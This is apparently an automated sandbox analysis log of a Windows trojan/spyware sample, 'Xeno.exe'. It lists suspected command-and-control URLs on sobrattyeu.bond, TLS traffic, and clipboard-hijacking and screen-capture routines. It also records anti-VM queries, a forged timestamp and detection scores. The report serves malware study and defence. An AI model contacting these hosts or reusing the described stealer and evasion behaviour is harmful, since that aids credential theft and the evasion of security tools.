                      Source: Xeno.exe, 00000001.00000002.2942920179.0000000000D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/TEQN7c
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, Xeno.exe, 00000001.00000002.2942776722.0000000000CAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/api
                      Source: Xeno.exe, 00000001.00000002.2942823706.0000000000CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/api7
                      Source: Xeno.exeString found in binary or memory: https://www.digicert.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00435030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_00435030
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_03271000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,1_2_03271000
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00435030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,1_2_00435030
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004351D0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectObject,BitBlt,SelectObject,DeleteDC,1_2_004351D0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043D0F01_2_0043D0F0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004270901_2_00427090
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004240A01_2_004240A0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004119001_2_00411900
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042D19A1_2_0042D19A
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00433A7F1_2_00433A7F
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0040D3631_2_0040D363
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00414B681_2_00414B68
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00440B901_2_00440B90
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004085701_2_00408570
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00439FE01_2_00439FE0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004010401_2_00401040
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004038601_2_00403860
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042806B1_2_0042806B
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004090001_2_00409000
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004058201_2_00405820
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043F82B1_2_0043F82B
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041C8301_2_0041C830
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004408D01_2_004408D0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004208E01_2_004208E0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004080801_2_00408080
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004060801_2_00406080
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004250991_2_00425099
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004268B21_2_004268B2
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041E1401_2_0041E140
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041794B1_2_0041794B
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041B9501_2_0041B950
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043B1501_2_0043B150
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042D9551_2_0042D955
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004159011_2_00415901
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041C1101_2_0041C110
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004291C31_2_004291C3
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041A9E51_2_0041A9E5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004411901_2_00441190
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004401901_2_00440190
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004192701_2_00419270
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004402701_2_00440270
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004042101_2_00404210
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004072F01_2_004072F0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00404B401_2_00404B40
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042F3701_2_0042F370
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043B3701_2_0043B370
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00434BD01_2_00434BD0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004093E01_2_004093E0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00416B821_2_00416B82
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041BC601_2_0041BC60
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004304771_2_00430477
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00414C041_2_00414C04
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043AC101_2_0043AC10
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00427CE51_2_00427CE5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004174FD1_2_004174FD
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00430D631_2_00430D63
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004195701_2_00419570
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004115771_2_00411577
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004065101_2_00406510
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004395101_2_00439510
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00437D151_2_00437D15
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004335391_2_00433539
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041F5C01_2_0041F5C0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004145E01_2_004145E0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041AD891_2_0041AD89
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0041C5A01_2_0041C5A0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00420DA01_2_00420DA0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043FE401_2_0043FE40
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00402E501_2_00402E50
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0040A6101_2_0040A610
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00426E261_2_00426E26
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0040AE251_2_0040AE25
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00410E2B1_2_00410E2B
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004386331_2_00438633
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00438E3A1_2_00438E3A
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004406D01_2_004406D0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00422EFD1_2_00422EFD
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043D6A01_2_0043D6A0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043FF501_2_0043FF50
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004397701_2_00439770
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043FF701_2_0043FF70
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_004187001_2_00418700
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00440F001_2_00440F00
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042DFC31_2_0042DFC3
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042D7C01_2_0042D7C0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00413FF01_2_00413FF0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0042C7901_2_0042C790
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00429FB01_2_00429FB0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0040C7B51_2_0040C7B5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: String function: 00413BD0 appears 121 times
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: String function: 00407E80 appears 49 times
                      Source: C:\Users\user\Desktop\Xeno.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                      Source: Xeno.exeStatic PE information: invalid certificate
                      Source: Xeno.exe, 00000000.00000002.1846632115.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Xeno.exe
                      Source: Xeno.exe, 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exe, 00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exeBinary or memory string: OriginalFilenameHandler.exe0 vs Xeno.exe
                      Source: Xeno.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: Xeno.exeStatic PE information: Section: .idata ZLIB complexity 1.0003388400163666
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@1/1
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00439FE0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,1_2_00439FE0
                      Source: C:\Users\user\Desktop\Xeno.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5544
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\4c56b1cb-5b0c-4434-a4bd-c8256ae06dbfJump to behavior
                      Source: Xeno.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Xeno.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\Xeno.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Xeno.exeVirustotal: Detection: 47%
                      Source: Xeno.exeReversingLabs: Detection: 60%
                      Source: C:\Users\user\Desktop\Xeno.exeFile read: C:\Users\user\Desktop\Xeno.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"
                      Source: C:\Users\user\Desktop\Xeno.exeProcess created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"
                      Source: C:\Users\user\Desktop\Xeno.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924
                      Source: C:\Users\user\Desktop\Xeno.exeProcess created: C:\Users\user\Desktop\Xeno.exe "C:\Users\user\Desktop\Xeno.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: Xeno.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Xeno.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Xeno.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: System.Windows.Forms.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdbt-^q source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdbh source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdb source: Xeno.exe, WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Xeno.exeStatic PE information: 0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00443A67 push eax; ret 1_2_00443A6A
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00447A70 push edi; iretd 1_2_00447A72
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00444AA3 push eax; retf 1_2_00444AA4
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00447B7C push ss; iretd 1_2_00447BBB
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_0043FDF0 push eax; mov dword ptr [esp], C0C3C2F5h1_2_0043FDF2
                      Source: C:\Users\user\Desktop\Xeno.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Xeno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
